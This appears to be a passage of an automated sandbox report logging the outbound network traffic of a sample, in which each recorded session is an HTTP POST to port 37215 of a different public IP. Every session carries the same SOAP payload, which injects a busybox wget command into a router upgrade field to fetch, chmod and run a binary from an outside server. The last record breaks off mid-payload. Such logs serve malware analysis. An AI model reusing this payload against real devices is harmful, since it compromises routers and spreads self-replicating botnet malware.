                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1726192.168.2.135249441.225.163.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536570072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1727192.168.2.134084841.245.17.22537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536638021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1728192.168.2.1353312197.58.246.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536640882 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1729192.168.2.135515279.195.123.4337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536645889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1730192.168.2.1345934157.153.112.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536647081 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1731192.168.2.1339468197.21.208.8037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536712885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1732192.168.2.1333120171.236.183.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536712885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1733192.168.2.1353236211.152.255.18737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536715984 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1734192.168.2.135407441.30.141.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536787987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1735192.168.2.134183841.34.228.24637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536797047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 